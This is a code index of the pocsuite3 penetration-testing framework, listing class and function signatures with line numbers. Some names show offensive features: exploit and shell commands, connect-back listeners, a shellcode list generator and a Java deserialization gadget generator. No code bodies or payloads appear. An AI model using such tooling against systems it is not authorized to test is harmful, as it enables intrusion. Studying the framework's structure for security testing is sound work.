class PocsuiteSystemException (line 24) | class PocsuiteSystemException(PocsuiteBaseException):
class PocsuiteFilePathException (line 28) | class PocsuiteFilePathException(PocsuiteBaseException):
class PocsuiteConnectionException (line 32) | class PocsuiteConnectionException(PocsuiteBaseException):
class PocsuiteThreadException (line 36) | class PocsuiteThreadException(PocsuiteBaseException):
class PocsuiteValueException (line 40) | class PocsuiteValueException(PocsuiteBaseException):
class PocsuiteMissingPrivileges (line 44) | class PocsuiteMissingPrivileges(PocsuiteBaseException):
class PocsuiteSyntaxException (line 48) | class PocsuiteSyntaxException(PocsuiteBaseException):
class PocsuiteValidationException (line 52) | class PocsuiteValidationException(PocsuiteBaseException):
class PocsuiteMissingMandatoryOptionException (line 56) | class PocsuiteMissingMandatoryOptionException(PocsuiteBaseException):
class PocsuitePluginBaseException (line 60) | class PocsuitePluginBaseException(PocsuiteBaseException):
class PocsuitePluginDorkException (line 64) | class PocsuitePluginDorkException(PocsuitePluginBaseException):
class PocsuiteHeaderTypeException (line 68) | class PocsuiteHeaderTypeException(PocsuiteBaseException):
class PocsuiteIncompleteRead (line 72) | class PocsuiteIncompleteRead(HTTPException):
method __init__ (line 73) | def __init__(self, partial, expected=None):
method __repr__ (line 78) | def __repr__(self):
method __str__ (line 86) | def __str__(self):
FILE: pocsuite3/lib/core/interpreter.py
class BaseInterpreter (line 21) | class BaseInterpreter(object):
method __init__ (line 24) | def __init__(self):
method setup (line 32) | def setup(self):
method parse_line (line 42) | def parse_line(self, line):
method prompt (line 52) | def prompt(self):
method get_command_handler (line 56) | def get_command_handler(self, command):
method start (line 74) | def start(self):
method complete (line 107) | def complete(self, text, state):
method commands (line 139) | def commands(self, *ignored):
method raw_command_completer (line 147) | def raw_command_completer(self, text, line, start_index, end_index):
method default_completer (line 151) | def default_completer(self, *ignored):
method suggested_commands (line 154) | def suggested_commands(self):
class PocsuiteInterpreter (line 164) | class PocsuiteInterpreter(BaseInterpreter):
method __init__ (line 183) | def __init__(self, module_directory=paths.POCSUITE_POCS_PATH):
method __parse_prompt (line 217) | def __parse_prompt(self):
method module_metadata (line 225) | def module_metadata(self):
method prompt (line 229) | def prompt(self):
method command_show (line 245) | def command_show(self, *args, **kwargs):
method command_exit (line 255) | def command_exit(self, *args, **kwargs):
method command_clear (line 258) | def command_clear(self, *args, **kwargs):
method command_help (line 264) | def command_help(self, *args, **kwargs):
method _show_ip (line 272) | def _show_ip(self, *args, **kwargs):
method command_back (line 283) | def command_back(self, *args, **kwargs):
method command_q (line 286) | def command_q(self, *args, **kwargs):
method command_search (line 292) | def command_search(self, *args, **kwargs):
method command_use (line 317) | def command_use(self, module_path, *args, **kwargs):
method command_set (line 356) | def command_set(self, *args, **kwargs):
method _attack_mode (line 377) | def _attack_mode(self, mod):
method _set_global_conf (line 399) | def _set_global_conf(self):
method command_check (line 418) | def command_check(self, *args, **kwargs):
method command_verify (line 425) | def command_verify(self, *args, **kwargs):
method command_attack (line 429) | def command_attack(self, *args, **kwargs):
method command_run (line 436) | def command_run(self, *args, **kwargs):
method command_exploit (line 440) | def command_exploit(self, *args, **kwargs):
method command_shell (line 451) | def command_shell(self, *args, **kwargs):
method command_setg (line 455) | def command_setg(self, *args, **kwargs):
method command_list (line 464) | def command_list(self, *args, **kwargs):
method _show_all (line 481) | def _show_all(self, *args, **kwargs):
method _show_info (line 489) | def _show_info(self, *args, **kwargs):
method _show_options (line 506) | def _show_options(self, *args, **kwargs):
method complete_use (line 548) | def complete_use(self, text, *args, **kwargs):
method complete_show (line 565) | def complete_show(self, text, *args, **kwargs):
method complete_set (line 576) | def complete_set(self, text, *args, **kwargs):
FILE: pocsuite3/lib/core/interpreter_option.py
class Option (line 10) | class Option(object):
method __init__ (line 13) | def __init__(self, default, description="", require=False):
method __get__ (line 23) | def __get__(self, instance, owner):
method __iter__ (line 35) | def __iter__(self):
class OptIP (line 47) | class OptIP(Option):
method __init__ (line 50) | def __init__(self, default, description="", require=False):
method __set__ (line 56) | def __set__(self, instance, value):
class OptPort (line 63) | class OptPort(Option):
method __init__ (line 66) | def __init__(self, default, description="", require=False):
method __set__ (line 72) | def __set__(self, instance, value):
class OptBool (line 85) | class OptBool(Option):
method __init__ (line 88) | def __init__(self, default, description="", require=False):
method __set__ (line 99) | def __set__(self, instance, value):
class OptInteger (line 114) | class OptInteger(Option):
method __init__ (line 117) | def __init__(self, default, description="", require=False):
method __set__ (line 122) | def __set__(self, instance, value):
class OptFloat (line 130) | class OptFloat(Option):
method __init__ (line 133) | def __init__(self, default, description="", require=False):
method __set__ (line 138) | def __set__(self, instance, value):
class OptString (line 146) | class OptString(Option):
method __init__ (line 149) | def __init__(self, default, description="", require=False):
method __set__ (line 154) | def __set__(self, instance, value):
class OptItems (line 161) | class OptItems(Option):
method __init__ (line 162) | def __init__(self, default, description="", selected="", require=False):
method __set__ (line 171) | def __set__(self, instance, value):
class OptDict (line 177) | class OptDict:
method __init__ (line 178) | def __init__(self, require=False, selected=False, default={}):
method __set__ (line 194) | def __set__(self, instance, value):
FILE: pocsuite3/lib/core/option.py
function _resolve_cross_references (line 52) | def _resolve_cross_references():
function set_verbosity (line 58) | def set_verbosity():
function _set_http_user_agent (line 87) | def _set_http_user_agent():
function _set_http_referer (line 96) | def _set_http_referer():
function _set_http_cookie (line 101) | def _set_http_cookie():
function _set_http_host (line 109) | def _set_http_host():
function _set_http_extra_headers (line 114) | def _set_http_extra_headers():
function _set_network_timeout (line 128) | def _set_network_timeout():
function _set_network_proxy (line 143) | def _set_network_proxy():
function _set_session_queue (line 208) | def _set_session_queue():
function _set_multiple_targets (line 220) | def _set_multiple_targets():
function _set_task_queue (line 260) | def _set_task_queue():
function _check_account_login (line 267) | def _check_account_login():
function _check_ceye (line 273) | def _check_ceye():
function _check_seebug (line 279) | def _check_seebug():
function _check_zoomeye (line 285) | def _check_zoomeye():
function _set_threads (line 291) | def _set_threads():
function _set_connect_back (line 296) | def _set_connect_back():
function _set_listener (line 323) | def _set_listener():
function _set_user_pocs_path (line 328) | def _set_user_pocs_path():
function _set_pocs_modules (line 340) | def _set_pocs_modules():
function _set_plugins (line 405) | def _set_plugins():
function _cleanup_options (line 432) | def _cleanup_options():
function _basic_option_validation (line 494) | def _basic_option_validation():
function _adjust_logging_formatter (line 501) | def _adjust_logging_formatter():
function _create_directory (line 518) | def _create_directory():
function _set_conf_attributes (line 535) | def _set_conf_attributes():
function _set_kb_attributes (line 634) | def _set_kb_attributes(flush_all=True):
function _merge_options (line 681) | def _merge_options(input_options, override_options):
function _set_poc_options (line 700) | def _set_poc_options(input_options):
function _set_docker_options (line 706) | def _set_docker_options():
function init_options (line 746) | def init_options(input_options=AttribDict(), override_options=False):
function _init_targets_plugins (line 770) | def _init_targets_plugins():
function _init_pocs_plugins (line 775) | def _init_pocs_plugins():
function _init_results_plugins (line 780) | def _init_results_plugins():
function _init_kb_comparison (line 785) | def _init_kb_comparison():
function _init_target_from_poc_dork (line 790) | def _init_target_from_poc_dork():
function _show_pocs_modules_options (line 820) | def _show_pocs_modules_options():
function _show_pocs_form_local (line 839) | def _show_pocs_form_local():
function init (line 882) | def init():
FILE: pocsuite3/lib/core/plugin.py
class PluginBase (line 9) | class PluginBase(object):
method __init__ (line 11) | def __init__(self):
method get_category (line 14) | def get_category(self):
method add_target (line 17) | def add_target(self, target):
method add_poc (line 31) | def add_poc(self, poc, fullname=None):
method add_poc_from_file (line 46) | def add_poc_from_file(self, filename):
method format_poc (line 64) | def format_poc(poc):
method check_poc (line 70) | def check_poc(poc):
method get_results (line 74) | def get_results():
method init (line 77) | def init(self):
method start (line 80) | def start(self):
method handle (line 83) | def handle(self, output):
function register_plugin (line 87) | def register_plugin(plugin_class):
FILE: pocsuite3/lib/core/poc.py
class POCBase (line 18) | class POCBase(object):
method __init__ (line 19) | def __init__(self):
method get_options (line 83) | def get_options(self):
method get_option (line 94) | def get_option(self, name):
method get_infos (line 104) | def get_infos(self):
method getg_option (line 121) | def getg_option(self, name):
method getp_option (line 127) | def getp_option(self, name):
method get_category (line 132) | def get_category(self):
method set_options (line 135) | def set_options(self, kwargs):
method set_option (line 141) | def set_option(self, key, value):
method setg_option (line 148) | def setg_option(self, key, value):
method setp_option (line 153) | def setp_option(self, key, value):
method check_requirement (line 158) | def check_requirement(self, *args):
method build_url (line 166) | def build_url(self, target=''):
method _execute (line 225) | def _execute(self):
method execute (line 237) | def execute(self, target, headers=None, params=None, mode='verify', ve...
method _check (line 306) | def _check(self, dork='', allow_redirects=False, return_obj=False, is_...
method _shell (line 440) | def _shell(self):
method _attack (line 448) | def _attack(self):
method _verify (line 456) | def _verify(self):
method parse_output (line 464) | def parse_output(self, result={}):
method _run (line 472) | def _run(self):
class Output (line 481) | class Output(object):
method __init__ (line 482) | def __init__(self, poc=None):
method is_success (line 500) | def is_success(self):
method success (line 503) | def success(self, result):
method fail (line 508) | def fail(self, error=""):
method error (line 513) | def error(self, error=""):
method show_result (line 517) | def show_result(self):
method to_dict (line 530) | def to_dict(self):
FILE: pocsuite3/lib/core/readlineng.py
function clear_history (line 56) | def clear_history():
FILE: pocsuite3/lib/core/register.py
class PocLoader (line 14) | class PocLoader(Loader):
method __init__ (line 15) | def __init__(self, fullname, path):
method set_data (line 20) | def set_data(self, data):
method get_filename (line 23) | def get_filename(self, fullname):
method get_data (line 26) | def get_data(self, filename):
method check_requires (line 41) | def check_requires(data):
method exec_module (line 68) | def exec_module(self, module):
function load_file_to_module (line 85) | def load_file_to_module(file_path, module_name=None):
function load_string_to_module (line 103) | def load_string_to_module(code_string, fullname=None):
function register_poc (line 122) | def register_poc(poc_class):
FILE: pocsuite3/lib/core/revision.py
function stdout_encode (line 6) | def stdout_encode(data):
function get_revision_number (line 17) | def get_revision_number():
FILE: pocsuite3/lib/core/shell.py
class CompleterNG (line 14) | class CompleterNG(rlcompleter.Completer):
method global_matches (line 15) | def global_matches(self, text):
function readline_available (line 35) | def readline_available():
function clear_history (line 44) | def clear_history():
function save_history (line 51) | def save_history(completion=None):
function load_history (line 80) | def load_history(completion=None):
function auto_completion (line 105) | def auto_completion(completion=None, os=None, commands=None, console=None):
FILE: pocsuite3/lib/core/statistics_comparison.py
class StatisticsComparison (line 5) | class StatisticsComparison(object):
method __init__ (line 7) | def __init__(self):
method add_dork (line 11) | def add_dork(self, source, dork):
method add_ip (line 14) | def add_ip(self, ip, source, honeypot=False):
method getinfo (line 23) | def getinfo(self, ip) -> tuple:
method change_success (line 29) | def change_success(self, ip, success=False):
method _statistics (line 33) | def _statistics(self) -> dict:
method output (line 51) | def output(self):
FILE: pocsuite3/lib/core/template.py
function new_poc (line 8) | def new_poc():
function create_poc_plugin_template (line 226) | def create_poc_plugin_template():
FILE: pocsuite3/lib/core/threads.py
function exception_handled_function (line 14) | def exception_handled_function(thread_function, args=(), silent=False):
function run_threads (line 28) | def run_threads(num_threads, thread_function, args: tuple = (), forward_...
FILE: pocsuite3/lib/core/update.py
function update (line 7) | def update():
FILE: pocsuite3/lib/helper/archieve/jar.py
class Jar (line 5) | class Jar(Zip):
method __init__ (line 6) | def __init__(self, filename=''):
method get_manifest (line 11) | def get_manifest(self, main_class='Test.Payload'):
method add_file (line 17) | def add_file(self, name, content='', write_to_manifest=True):
method __add_file_to_manifest (line 22) | def __add_file_to_manifest(self, filename):
method create_manifest (line 25) | def create_manifest(self):
method get_raw (line 29) | def get_raw(self, remove_temp=False):
method get_jar (line 40) | def get_jar(self):
FILE: pocsuite3/lib/helper/archieve/memoryzip.py
class InMemoryZip (line 12) | class InMemoryZip(object):
method __init__ (line 13) | def __init__(self):
method add_file (line 16) | def add_file(self, filename_in_zip, file_contents):
method read (line 23) | def read(self):
method write_to_file (line 27) | def write_to_file(self, filename):
FILE: pocsuite3/lib/helper/archieve/war.py
class InMemoryWar (line 14) | class InMemoryWar(InMemoryZip):
method __init__ (line 15) | def __init__(self, use_default_template=False):
method create_archieve (line 19) | def create_archieve(self, use_default_template):
class War (line 35) | class War(Zip):
method __init__ (line 36) | def __init__(self, filename='', use_default_template=False):
method create_template (line 42) | def create_template(self):
method get_raw (line 56) | def get_raw(self, remove_temp=False):
method get_war (line 65) | def get_war(self):
FILE: pocsuite3/lib/helper/archieve/zip.py
class Zip (line 4) | class Zip:
method __init__ (line 5) | def __init__(self, filename=''):
method create_archieve (line 11) | def create_archieve(self, filename):
method add_file (line 17) | def add_file(self, name, content=''):
method is_valid (line 28) | def is_valid(self, filename=''):
FILE: pocsuite3/lib/helper/java/serialization.py
class Constants (line 4) | class Constants:
class Element (line 48) | class Element:
method __init__ (line 49) | def __init__(self, stream=""):
method decode (line 52) | def decode(self, io):
method encode (line 55) | def encode(self):
method __str__ (line 58) | def __str__(self):
class Annotation (line 62) | class Annotation(Element):
method __init__ (line 63) | def __init__(self, stream=None):
method decode (line 67) | def decode(self, io):
method encode (line 75) | def encode(self):
method __str__ (line 83) | def __str__(self):
class BlockData (line 91) | class BlockData(Element):
method __init__ (line 92) | def __init__(self, stream=None, contents=''):
method decode (line 97) | def decode(self, io):
method encode (line 110) | def encode(self):
method __str__ (line 115) | def __str__(self):
class BlockDataLong (line 122) | class BlockDataLong(Element):
method __init__ (line 123) | def __init__(self, stream=None, contents=''):
method decode (line 128) | def decode(self, io):
method encode (line 141) | def encode(self):
method __str__ (line 146) | def __str__(self):
class ClassDesc (line 150) | class ClassDesc(Element):
method __init__ (line 151) | def __init__(self, stream=None):
method decode (line 155) | def decode(self, io):
method encode (line 163) | def encode(self):
method __str__ (line 171) | def __str__(self):
class EndBlockData (line 175) | class EndBlockData(Element):
class Field (line 179) | class Field(Element):
method __init__ (line 180) | def __init__(self, stream=''):
method decode (line 186) | def decode(self, io):
method encode (line 197) | def encode(self):
method is_type_valid (line 210) | def is_type_valid(self):
method is_primitive (line 215) | def is_primitive(self):
method is_object (line 220) | def is_object(self):
method is_valid (line 225) | def is_valid(self, code):
method encode_field_type (line 230) | def encode_field_type(self):
method decode_field_type (line 237) | def decode_field_type(self, io):
method __str__ (line 244) | def __str__(self):
class NewArray (line 253) | class NewArray(Element):
method __init__ (line 254) | def __init__(self, stream=''):
method decode (line 260) | def decode(self, io):
method encode (line 272) | def encode(self):
method decode_values_length (line 282) | def decode_values_length(self, io):
method array_type (line 288) | def array_type(self):
method decode_value (line 307) | def decode_value(self, io):
method encode_value (line 352) | def encode_value(self, value):
method __str__ (line 375) | def __str__(self):
class NewClass (line 381) | class NewClass(Element):
method __init__ (line 382) | def __init__(self, stream=''):
method decode (line 386) | def decode(self, io):
method encode (line 393) | def encode(self):
method __str__ (line 400) | def __str__(self):
class NewClassDesc (line 404) | class NewClassDesc(Element):
method __init__ (line 405) | def __init__(self, stream=''):
method decode (line 414) | def decode(self, io):
method encode (line 432) | def encode(self):
method decode_serial_version (line 448) | def decode_serial_version(self, io):
method decode_flags (line 454) | def decode_flags(self, io):
method decode_fields_length (line 460) | def decode_fields_length(self, io):
method __str__ (line 466) | def __str__(self):
class NewEnum (line 478) | class NewEnum(Element):
method __init__ (line 479) | def __init__(self, stream=''):
method decode (line 484) | def decode(self, io):
method encode (line 492) | def encode(self):
method decode_constant_name (line 500) | def decode_constant_name(self, io):
class NewObject (line 507) | class NewObject(Element):
method __init__ (line 508) | def __init__(self, stream=None):
method decode (line 513) | def decode(self, io):
method encode (line 526) | def encode(self):
method decode_class_data (line 538) | def decode_class_data(self, io, my_class_desc):
method decode_class_fields (line 549) | def decode_class_fields(self, io, my_class_desc):
method decode_value (line 559) | def decode_value(self, io, type):
method encode_value (line 596) | def encode_value(self, value):
method __str__ (line 618) | def __str__(self):
class NullReference (line 633) | class NullReference(Element):
class ProxyClassDesc (line 637) | class ProxyClassDesc(Element):
method __init__ (line 638) | def __init__(self, stream=''):
method decode (line 644) | def decode(self, io):
method encode (line 658) | def encode(self):
method decode_interfaces_length (line 669) | def decode_interfaces_length(self, io):
method __str__ (line 675) | def __str__(self):
class Reference (line 686) | class Reference(Element):
method __init__ (line 687) | def __init__(self, stream=''):
method decode (line 691) | def decode(self, io):
method encode (line 698) | def encode(self):
method __str__ (line 705) | def __str__(self):
class Reset (line 709) | class Reset(Element):
class Stream (line 713) | class Stream(Element):
method __init__ (line 714) | def __init__(self, stream=None):
method decode (line 721) | def decode(self, io):
method encode (line 732) | def encode(self):
method add_reference (line 740) | def add_reference(self, ref):
method decode_magic (line 743) | def decode_magic(self, io):
method decode_version (line 750) | def decode_version(self, io):
class Utf (line 758) | class Utf(Element):
method __init__ (line 759) | def __init__(self, stream='', contents=''):
method decode (line 764) | def decode(self, io):
method encode (line 777) | def encode(self):
method __str__ (line 782) | def __str__(self):
class LongUtf (line 786) | class LongUtf(Utf):
method decode (line 787) | def decode(self, io):
method encode (line 800) | def encode(self):
function decode_content (line 806) | def decode_content(io, stream):
function encode_content (line 864) | def encode_content(content):
function print_content (line 901) | def print_content(content):
function print_class (line 938) | def print_class(content):
function get_key_by_value (line 942) | def get_key_by_value(dictionary, search_value):
FILE: pocsuite3/lib/parse/cmd.py
function cmd_line_parser (line 11) | def cmd_line_parser(argv=None):
FILE: pocsuite3/lib/parse/configfile.py
function config_file_parser (line 11) | def config_file_parser(configFile):
FILE: pocsuite3/lib/parse/dockerfile.py
function parse_dockerfile (line 7) | def parse_dockerfile(file):
FILE: pocsuite3/lib/parse/rules.py
function regex_rule (line 7) | def regex_rule(files):
FILE: pocsuite3/lib/parse/url.py
class URL (line 4) | class URL:
method __init__ (line 6) | def __init__(self, schema: bytes, host: bytes, port, path: bytes,
method raw (line 24) | def raw(self):
method __repr__ (line 27) | def __repr__(self):
function parse_url (line 33) | def parse_url(url):
FILE: pocsuite3/lib/request/patch/__init__.py
function patch_all (line 13) | def patch_all():
function _update_chunk_length (line 25) | def _update_chunk_length(self):
FILE: pocsuite3/lib/request/patch/add_httpraw.py
function extract_dict (line 8) | def extract_dict(text, sep, sep2="="):
function httpraw (line 23) | def httpraw(raw: str, ssl: bool = False, **kwargs):
function patch_addraw (line 76) | def patch_addraw():
FILE: pocsuite3/lib/request/patch/hook_request.py
function session_request (line 12) | def session_request(self, method, url,
function patch_session (line 96) | def patch_session():
FILE: pocsuite3/lib/request/patch/hook_request_redirect.py
function get_redirect_target (line 6) | def get_redirect_target(self, resp):
function patch_redirect (line 29) | def patch_redirect():
FILE: pocsuite3/lib/request/patch/hook_urllib3_parse_url.py
class HTTPError (line 6) | class HTTPError(Exception):
class LocationValueError (line 11) | class LocationValueError(ValueError, HTTPError):
class LocationParseError (line 16) | class LocationParseError(LocationValueError):
method __init__ (line 19) | def __init__(self, location):
class Url (line 33) | class Url(namedtuple('Url', url_attrs)):
method __new__ (line 41) | def __new__(cls, scheme=None, auth=None, host=None, port=None, path=None,
method hostname (line 53) | def hostname(self):
method request_uri (line 58) | def request_uri(self):
method netloc (line 68) | def netloc(self):
method url (line 75) | def url(self):
method __str__ (line 114) | def __str__(self):
function patched_parse_url (line 118) | def patched_parse_url(url):
function patch_urllib3_parse_url (line 243) | def patch_urllib3_parse_url():
FILE: pocsuite3/lib/request/patch/remove_ssl_verify.py
function remove_ssl_verify (line 4) | def remove_ssl_verify():
FILE: pocsuite3/lib/request/patch/session_reuse.py
class ReuseSession (line 4) | class ReuseSession:
method __init__ (line 5) | def __init__(self):
method __enter__ (line 9) | def __enter__(self):
method __exit__ (line 13) | def __exit__(self, *args):
function api_request (line 17) | def api_request(method, url, **kwargs):
FILE: pocsuite3/lib/request/patch/unquote_request_uri.py
function unquote_unreserved (line 12) | def unquote_unreserved(uri):
function patched_requote_uri (line 35) | def patched_requote_uri(uri):
function patched_encode_target (line 55) | def patched_encode_target(target):
function unquote_request_uri (line 59) | def unquote_request_uri():
FILE: pocsuite3/lib/utils/__init__.py
function urlparse (line 21) | def urlparse(address):
function url2ip (line 37) | def url2ip(url, with_port=False):
function str_to_dict (line 53) | def str_to_dict(value):
function random_str (line 60) | def random_str(length=10, chars=string.ascii_letters + string.digits):
function generate_random_user_agent (line 64) | def generate_random_user_agent():
function get_middle_text (line 68) | def get_middle_text(text, prefix, suffix, index=0):
function generate_shellcode_list (line 87) | def generate_shellcode_list(listener_ip, listener_port, os_target=OS.WIN...
function gen_cert (line 176) | def gen_cert(countryName='',
function minimum_version_required (line 284) | def minimum_version_required(ver):
FILE: pocsuite3/lib/utils/markup.py
class element (line 39) | class element:
method __init__ (line 42) | def __init__(self, tag, case='lower', parent=None):
method __call__ (line 54) | def __call__(self, *args, **kwargs):
method render (line 84) | def render(self, tag, single, between, kwargs):
method close (line 110) | def close(self):
method open (line 120) | def open(self, **kwargs):
class page (line 129) | class page:
method __init__ (line 133) | def __init__(self, mode='strict_html', case='lower', onetags=None, two...
method __getattr__ (line 203) | def __getattr__(self, attr):
method __str__ (line 216) | def __str__(self):
method __call__ (line 225) | def __call__(self, escape=False):
method add (line 237) | def add(self, text):
method addfooter (line 241) | def addfooter(self, text):
method addheader (line 245) | def addheader(self, text):
method addcontent (line 249) | def addcontent(self, text):
method init (line 253) | def init(self, lang='en', css=None, metainfo=None, title=None, header=...
method css (line 341) | def css(self, filelist):
method metainfo (line 351) | def metainfo(self, mydict):
method scripts (line 362) | def scripts(self, mydict):
class _oneliner (line 378) | class _oneliner:
method __init__ (line 383) | def __init__(self, case='lower'):
method __getattr__ (line 386) | def __getattr__(self, attr):
function _argsdicts (line 405) | def _argsdicts(args, mydict):
function _totuple (line 435) | def _totuple(x):
function escape (line 450) | def escape(text, newline=False):
function unescape (line 474) | def unescape(text):
class dummy (line 490) | class dummy:
class russell (line 501) | class russell:
method __contains__ (line 504) | def __contains__(self, item):
class MarkupError (line 508) | class MarkupError(Exception):
method __str__ (line 511) | def __str__(self):
class ClosingError (line 515) | class ClosingError(MarkupError):
method __init__ (line 516) | def __init__(self, tag):
class OpeningError (line 520) | class OpeningError(MarkupError):
method __init__ (line 521) | def __init__(self, tag):
class ArgumentError (line 525) | class ArgumentError(MarkupError):
method __init__ (line 526) | def __init__(self, tag):
class InvalidElementError (line 530) | class InvalidElementError(MarkupError):
method __init__ (line 531) | def __init__(self, tag, mode):
class DeprecationError (line 535) | class DeprecationError(MarkupError):
method __init__ (line 536) | def __init__(self, tag):
class ModeError (line 540) | class ModeError(MarkupError):
method __init__ (line 541) | def __init__(self, mode):
class CustomizationError (line 545) | class CustomizationError(MarkupError):
method __init__ (line 546) | def __init__(self):
FILE: pocsuite3/lib/utils/pcap_sniffer.py
class Sniffer (line 17) | class Sniffer(Thread):
method __init__ (line 18) | def __init__(self, filter):
method run (line 55) | def run(self):
method join (line 62) | def join(self, timeout=None):
FILE: pocsuite3/lib/yaml/nuclei/__init__.py
function hyphen_to_underscore (line 20) | def hyphen_to_underscore(dictionary):
function expand_preprocessors (line 49) | def expand_preprocessors(data: str) -> str:
class Nuclei (line 66) | class Nuclei:
method __init__ (line 67) | def __init__(self, template, target=''):
method execute_template (line 92) | def execute_template(self):
method run (line 149) | def run(self):
method __str__ (line 152) | def __str__(self):
FILE: pocsuite3/lib/yaml/nuclei/model/__init__.py
class CaseInsensitiveEnum (line 8) | class CaseInsensitiveEnum(Enum):
method _missing_ (line 10) | def _missing_(cls, value: str):
class Severify (line 16) | class Severify(CaseInsensitiveEnum):
class Classification (line 26) | class Classification:
class Info (line 36) | class Info:
FILE: pocsuite3/lib/yaml/nuclei/operators/extrators/__init__.py
class ExtractorType (line 14) | class ExtractorType(CaseInsensitiveEnum):
class Extractor (line 23) | class Extractor:
function extract_regex (line 64) | def extract_regex(e: Extractor, corpus: str) -> dict:
function extract_kval (line 95) | def extract_kval(e: Extractor, headers: CaseInsensitiveDict) -> dict:
function extract_xpath (line 127) | def extract_xpath(e: Extractor, corpus: str) -> dict:
function extract_json (line 165) | def extract_json(e: Extractor, corpus: str) -> dict:
function extract_dsl (line 203) | def extract_dsl(e: Extractor, data: dict) -> dict:
FILE: pocsuite3/lib/yaml/nuclei/operators/matchers/__init__.py
class MatcherType (line 11) | class MatcherType(CaseInsensitiveEnum):
class Matcher (line 22) | class Matcher:
function match_status_code (line 73) | def match_status_code(matcher: Matcher, status_code: int):
function match_size (line 79) | def match_size(matcher: Matcher, length: int):
function match_words (line 85) | def match_words(matcher: Matcher, corpus: str, data: dict) -> (bool, list):
function match_regex (line 122) | def match_regex(matcher: Matcher, corpus: str) -> (bool, list):
function match_binary (line 147) | def match_binary(matcher: Matcher, corpus: bytes) -> (bool, list):
function match_dsl (line 169) | def match_dsl(matcher: Matcher, data: dict) -> bool:
function match_xpath (line 191) | def match_xpath(matcher: Matcher, body: str) -> (bool, list):
FILE: pocsuite3/lib/yaml/nuclei/protocols/common/expressions/__init__.py
class Marker (line 26) | class Marker:
method extract_timeout_value (line 34) | def extract_timeout_value(raw_timeout: str) -> int:
function auto_convert_types (line 41) | def auto_convert_types(func):
function aes_gcm (line 87) | def aes_gcm(key: Union[bytes, str], plaintext: Union[bytes, str]) -> bytes:
function base64 (line 99) | def base64(src: Union[bytes, str]) -> str:
function base64_decode (line 111) | def base64_decode(src: Union[bytes, str]) -> bytes:
function base64_py (line 122) | def base64_py(src: Union[bytes, str]) -> str:
function concat (line 136) | def concat(*arguments: str) -> str:
function compare_versions (line 148) | def compare_versions(version_to_check: str, *constraints: str) -> bool:
function contains (line 173) | def contains(inp: str, substring: str) -> bool:
function contains_all (line 185) | def contains_all(inp: str, *substrings: str) -> bool:
function contains_any (line 197) | def contains_any(inp: str, *substrings: str) -> bool:
function dec_to_hex (line 208) | def dec_to_hex(number: Union[str, int]) -> str:
function hex_to_dec (line 221) | def hex_to_dec(hex_number: Union[str, int]) -> int:
function bin_to_dec (line 233) | def bin_to_dec(binary_number: Union[str, int]) -> int:
function oct_to_dec (line 245) | def oct_to_dec(octal_number: Union[str, int]) -> int:
function generate_java_gadget (line 257) | def generate_java_gadget(gadget: str, cmd: str, encoding: str) -> str:
function gzip (line 268) | def gzip(inp: Union[str, bytes]) -> bytes:
function gzip_decode (line 282) | def gzip_decode(inp: bytes) -> bytes:
function zlib (line 293) | def zlib(inp: Union[str, bytes]) -> bytes:
function zlib_decode (line 307) | def zlib_decode(inp: bytes) -> bytes:
function hex_decode (line 319) | def hex_decode(inp: str) -> bytes:
function hex_encode (line 330) | def hex_encode(inp: Union[str, bytes]) -> str:
function html_escape (line 344) | def html_escape(inp: str) -> str:
function html_unescape (line 356) | def html_unescape(inp: str) -> str:
function md5 (line 367) | def md5(inp: Union[str, bytes]) -> str:
function mmh3 (line 383) | def mmh3(inp: str) -> str:
function print_debug (line 403) | def print_debug(*args) -> None:
function rand_base (line 415) | def rand_base(length: int, optional_charset: str = string.ascii_letters ...
function rand_char (line 426) | def rand_char(optional_charset: str = string.ascii_letters + string.digi...
function rand_int (line 437) | def rand_int(optional_min: int = 0, optional_max: int = 2147483647) -> int:
function rand_text_alpha (line 448) | def rand_text_alpha(length: int, optional_bad_chars: str = '') -> str:
function rand_text_alphanumeric (line 460) | def rand_text_alphanumeric(length: int, optional_bad_chars: str = '') ->...
function rand_text_numeric (line 472) | def rand_text_numeric(length: int, optional_bad_numbers: str = '') -> str:
function regex (line 485) | def regex(pattern: str, inp: str) -> bool:
function remove_bad_chars (line 497) | def remove_bad_chars(inp: str, cutset: str) -> str:
function repeat (line 509) | def repeat(inp: str, count: int) -> str:
function replace (line 521) | def replace(inp: str, old: str, new: str) -> str:
function replace_regex (line 533) | def replace_regex(source: str, pattern: str, replacement: str) -> str:
function reverse (line 545) | def reverse(inp: str) -> str:
function sha1 (line 556) | def sha1(inp: Union[bytes, str]) -> str:
function sha256 (line 572) | def sha256(inp: Union[bytes, str]) -> str:
function to_lower (line 589) | def to_lower(inp: str) -> str:
function to_upper (line 601) | def to_upper(inp: str) -> str:
function trim (line 613) | def trim(inp: str, cutset: str) -> str:
function trim_left (line 625) | def trim_left(inp: str, cutset: str) -> str:
function trim_prefix (line 637) | def trim_prefix(inp: str, prefix: str) -> str:
function trim_right (line 651) | def trim_right(inp: str, cutset: str) -> str:
function trim_space (line 663) | def trim_space(inp: str) -> str:
function trim_suffix (line 675) | def trim_suffix(inp: str, suffix: str) -> str:
function unix_time (line 688) | def unix_time(optional_seconds: int = 0) -> int:
function url_decode (line 700) | def url_decode(inp: str) -> str:
function url_encode (line 711) | def url_encode(inp: str) -> str:
function wait_for (line 722) | def wait_for(seconds: int) -> bool:
function join (line 735) | def join(separator: str, *elements: str) -> str:
function hmac (line 746) | def hmac(algorithm: str, data: Union[bytes, str], secret: Union[bytes, s...
function date_time (line 762) | def date_time(date_time_format: str, optional_unix_time: int = int(time....
function to_unix_time (line 775) | def to_unix_time(inp: str, layout: str = "%Y-%m-%d %H:%M:%S") -> int:
function starts_with (line 787) | def starts_with(inp: str, *prefix: str) -> bool:
function line_starts_with (line 799) | def line_starts_with(inp: str, *prefix: str) -> bool:
function ends_with (line 815) | def ends_with(inp: str, *suffix: str) -> bool:
function line_ends_with (line 827) | def line_ends_with(inp: str, *suffix: str) -> bool:
function evaluate (line 842) | def evaluate(inp: str, dynamic_values: dict = None) -> str:
FILE: pocsuite3/lib/yaml/nuclei/protocols/common/expressions/safe_eval.py
function _check_name (line 25) | def _check_name(ast_node, allowed_variables=None):
function _check_attribute (line 32) | def _check_attribute(ast_node):
function _check_call (line 39) | def _check_call(ast_node, allowed_variables=None):
function _check_expression (line 58) | def _check_expression(text, allowed_variables=None):
function convert_logical_operators (line 133) | def convert_logical_operators(expression: str) -> str:
function safe_eval (line 149) | def safe_eval(expression, variables):
FILE: pocsuite3/lib/yaml/nuclei/protocols/common/generators/__init__.py
class AttackType (line 8) | class AttackType(CaseInsensitiveEnum):
function payload_generator (line 14) | def payload_generator(payloads: dict, attack_type: AttackType) -> Ordere...
